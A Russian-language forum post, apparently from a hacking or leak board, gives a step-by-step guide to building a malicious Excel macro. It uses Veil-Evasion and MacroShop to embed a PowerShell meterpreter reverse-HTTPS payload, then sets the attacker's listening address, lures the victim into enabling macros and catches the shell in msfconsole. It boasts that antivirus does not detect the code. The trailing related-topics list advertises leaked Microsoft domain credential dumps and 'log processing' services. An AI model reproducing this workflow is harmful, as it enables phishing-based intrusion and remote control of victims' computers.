Penetration Testing with Microsoft Office

Admin

Администратор
В этой статье я покажу, как можно получить доступ к удаленному компьютеру, используя Veil Evasion и Microsoft Excel. А точнее одно свойство Excel – поддержка макросов.

Макрос - это программа, которая содержит набор инструкций выполняющих какие либо действия, как автоматически, так и по требованию пользователя, т.е. выполняются явно и неявно. Широкое распространение, данное понятие получило благодаря корпорации Microsoft, которая реализовала возможность написания макросов в своих продуктах, а именно Office (Word, Excel, Access и т.д.). Используемый язык в макросах - Visual Basic, так же продукт Microsoft, но с некоторыми ограничениями. Макрокоманды, способны автоматизировать большинство процессов и значительно сократить время на обработку данных.

Способ получения Veil Evasion описан тут -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Запускаем Veil Evasion:
> ./Veil-Evasion.py

Вводим команду:
list (покажет список доступных пайлоадов)
77248797bb99eef69cb986e1d3cdb9dd.png

Мы будем использовать пайлоад с ID 23. Вводим:

> use powershell/meterpreter/rev_https

или

> use 23

Обратный протокол HTTPS, здесь будет успешно использован, в случае если файрвол у жертвы настроен таким образом, чтобы пропускать трафик по TCP. В большинстве случаев, на компьютере HTTPS не заблокирован.

Настроим Veil для нашего случая, пишем:

> set LHOST 172.16.0.199

Тут я немного прервусь, для объяснений, т.к. вопросы уже были.

Так как, я нахожусь с атакуемым компьютером в одной подсети, мы подключены к одному роутеру, то в поле LHOST я вписываю свой локальный адрес.
3fe9ab38bfaf2fb00393f4d57681340e.png

Именно на него «постучится» цель, после того как на нем сработает полезная нагрузка. Чтобы таким же образом подключится к компьютеру находящемуся в другой сети, вообще в другом городе/стране, необходимо сделать иначе. Для удобства лучше иметь статический (белый) IP адрес. К примеру, у вас роутер, вашей машине, с которой вы атакуете, был присвоен локальный адрес из диапазона 192.168.0.ХХХ. Но, в интернет вы выходите из под своего внешнего адреса, который присвоил вашему роутеру провайдер. Ваш компьютер, с которого вы проводите проникновение, находится за NAT роутера.
155bd37075fa01c23fa4f7580afd30b9.png

Допустим этот адрес 82.198.34.88, для того, чтобы целевой компьютер постучался на него мы в поле LHOST его и укажем. В опциях так же есть поле LPORT:

5ba34575950d4c26dc2dd2eb48678a28.png

Именно на этот LHOST и LPORT, будет пытаться подсоединиться цель. Затем необходимо указать роутеру, чтобы все пакеты, адресованные 8443 порту, он направлял нашей машине с Kali, у которой адрес 192.168.0.ХХХ. Для этого добавляем такое правило:

f793ca8967130fd1005d99749bebed92.png

Теперь все пакеты, которые предназначаются 443 (у меня так) порту, получит моя Kali c локальным адресом 192.168.0.101. Идем далее.

> generate
d0f7d6f86c34195a35ff0876d078f0f4.png

Вводим имя:
0b0673aed67852e7f0981033939051b7.png

Veil-Evasion сгенерировала нам файл win8.1.bat в директории - /usr/share/veil-output/source/

1668afbd9a7daf7b6109f747f7e9222c.png

Теперь откроем новое окно терминала и установим MacroShop. MacroShop представляет собой набор скриптов, помогающих в работе с пайлоадами, через Office Macros. Большинство из них, написаны на Python. Для его установки вводим:

> git clone

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



b3d92c276c33bdc3fff0901a14245aef.png

После установки, переместим файл win8.1 в директорию MacroShop.
278e0b3ea796add6279f8c4b7fa02fe7.png

Теперь, в терминале перейдем в директорию MacroShop, и пишем:

> python macro_safe.py windus.bat file.txt (windus.bat – потому, что я его пересоздал)

77ccf1f8e042655d560dba0739af21e5.png

После того, как процесс успешно завершился, откроем новый файл Excel (у себя) и проделаем следующее:

7a6c1c0b165c68c5350984e6a2090d92.png

Пишем имя макроса и создаем его. В открывшееся поле для редактирования, копируем код, который мы получили в файле – file.txt, затем сохраним макрос.

6f7f9b6c48fe72d2cf326cc8b469ba09.png

Копируем код полностью, заменяя строки которые были в начале макроса, это важно!

Сохраняем в формате, как на скриншоте:
d7e2872b46da5250e6eff300d224bd97.png

В самом документе пишем все, что угодно, нам нужно заинтересовать цель в открытии документа и включения макроса.

Теперь, когда файл оказался на целевом компьютере, у себя в терминале откроем msfconsole
0a9f5e35b43c890533c159584fb96d5b.png

и введем следующие команды:

> use multi/handler

> set payload/windows/meterpreter/reverse_https

> set LHOST 192.168.0.XXX

> set LPORT XXX (ваш порт)

> exploit


Когда на целевом хосте буде открыт дынный файл и выполнится макрос, у вас откроется сессия meterpreter, как и было обещано.
de3133dadedf2a49694b2252462f7438.png

Дальше дело техники. Спасибо за внимание.

P.S. Антивирусы не определяют данный код как вредоносный.

 
Похожие темы
E.Alderson Ищу наставника по penetration tester Ищу работу. Предлагаю свои услуги. 0
Eliot_lite.373 Ищу работу в сфере penetration tester, по w/b направлениям. Ищу работу. Предлагаю свои услуги. 0
D 150k Microsoft D4RKNETHUB CLOUD Раздачи и сливы 0
D 489.6k Microsoft D4RKNETHUB CLOUD Раздачи и сливы 0
D 49.5k Microsoft D4RKNETHUB CLOUD Раздачи и сливы 0
Support81 Новая тактика «Призрачных звонков» использует Zoom и Microsoft Teams для операций C2 Новости в сети 0
Support81 Вирус-вымогатель Akira использует инструмент настройки процессора, чтобы отключить Microsoft Defender Новости в сети 0
ValidMail ♋ 14kk MICROSOFT DOMAIN WITH VALID 05/08/25 ♋ Раздачи и сливы 0
ValidMail ♋ 1.2 MILLION MICROSOFT DOMAIN (HAVE VALID) 30/07/25 ♋ Раздачи и сливы 0
Support81 Microsoft снова сыграла на руку хакерам — корпоративные сети ломают через официальный софт Новости в сети 0
ValidMail ♋ 32k MICROSOFT DOMAINS WITH VALID 21.05.25 ♋ Раздачи и сливы 0
Support81 Плати или рискуй: Microsoft будет брать плату за обновления Windows Новости в сети 0
Support81 Microsoft дала ИИ настоящий инструмент программиста — и он впервые узнал, как сложно быть человеком Новости в сети 0
BinaryCloud (62.263 lines) Semi Private Microsoft Domain Leak Раздачи и сливы 0
BinaryCloud (101.200 lines) Good leak Microsoft Domain BinaryCloud Раздачи и сливы 0
BinaryCloud (78.231 lines) Good leak Microsoft Domain BinaryCloud Раздачи и сливы 0
BinaryCloud (73.764 lines) Semi Private Microsoft Domain Leak Раздачи и сливы 0
BinaryCloud (58.262 lines) UHQ Leak Combos Microsoft Domain Раздачи и сливы 0
BinaryCloud (93.164 lines) Semi Private Microsoft Domain Leak Раздачи и сливы 0
BinaryCloud (89.879 lines) UHQ Leak Combos Microsoft Domain Раздачи и сливы 0
BinaryCloud (117.025 lines) Semi Private Microsoft Domain Leak Раздачи и сливы 0
BinaryCloud (69.533 lines) Semi Private Microsoft Domain Leak Раздачи и сливы 0
BinaryCloud (63.984 lines) UHQ Leak Combos Microsoft Domain Раздачи и сливы 0
BinaryCloud (109.903 lines) Good leak Microsoft Domain BinaryCloud Раздачи и сливы 0
BinaryCloud (117.840 lines) Semi Private Microsoft Domain Leak Раздачи и сливы 0
BinaryCloud (94.664 lines) Semi Private Microsoft Domain Leak Раздачи и сливы 0
BinaryCloud (102.339 lines) Good leak Microsoft Domain BinaryCloud Раздачи и сливы 0
Support81 Разработчики игр восстали против нового игрового инструмента искусственного интеллекта от Microsoft Новости в сети 0
Support81 Storm-2372: конференции в Microsoft 365 стали инструментом кражи гостайны Новости в сети 0
Support81 Банды программ-вымогателей выдают себя за ИТ-поддержку в фишинговых атаках на Microsoft Teams Новости в сети 0
Support81 BadRAM: как взломать облака Amazon, Google и Microsoft за $10 Новости в сети 0
Support81 Microsoft сокрушила фишинг-империю: уничтожено 240 сайтов MRxC0DER Новости в сети 0
ValidMail ♋ 54k MICROSOFT DOMAINS WITH VALID 01.11.24 ♋ Раздачи и сливы 0
Support81 Sway и QR-коды: опасный фишинговый тандем, нацеленный на сервисы Microsoft 365 Новости в сети 0
Support81 CloudSorcerer: хакеры шпионят за российскими чиновниками через Microsoft Graph, Yandex Cloud и Dropbox Новости в сети 0
Support81 Роaring Kitty – легенда или аферист: Microsoft India втянута в мошенническую схему Новости в сети 0
Support81 Функция Recall от Microsoft — шаг к тотальному наблюдению? Новости в сети 0
Support81 Amazon, Google и Microsoft открыты для хакеров: ошибка Fluent Bit дает доступ к данным Новости в сети 0
Emilio_Gaviriya Статья Защита и надёжность: Важность патчей для Microsoft Active Directory. Вирусология 0
Support81 Не только умный, но и опасный: темная сторона ИИ от Microsoft Новости в сети 0
Support81 Уязвимость Microsoft Office становится временной бомбой в руках киберпреступников Новости в сети 0
Support81 Пользователи Microsoft 365 рискуют потерять аккаунт: не спасёт даже МФА Новости в сети 0
Support81 Вот это поворот: Microsoft Defender стал помечать Tor Browser как вредоносное ПО Новости в сети 2
Support81 Похитители cookie: Microsoft предупреждает о росте числа атак «человек посередине» с обходом MFA Новости в сети 0
Support81 Киберпреступники активно подделывают системы авторизации Microsoft и Adobe Новости в сети 0
phantom_gift AMAZON & MICROSOFT & PAYPAL - Отработаю ваши логи Ищу работу. Предлагаю свои услуги. 1
K kamisama refund service | Amazon 15% | Logitech | Microsoft | Ищу работу. Предлагаю свои услуги. 1
Denik Интересно Хакерская группировка АРТ31 впервые атаковала российские компании Microsoft обвиняла ее в атаке на участников выборов президнта США 2020 года Новости в сети 0
J Аккаунт microsoft azure 200$ balance Дедики/VPN/соксы/ssh 0
Denik Интересно Эксперты Microsoft нашли критические баги в роутерах Netgear Новости в сети 0

Название темы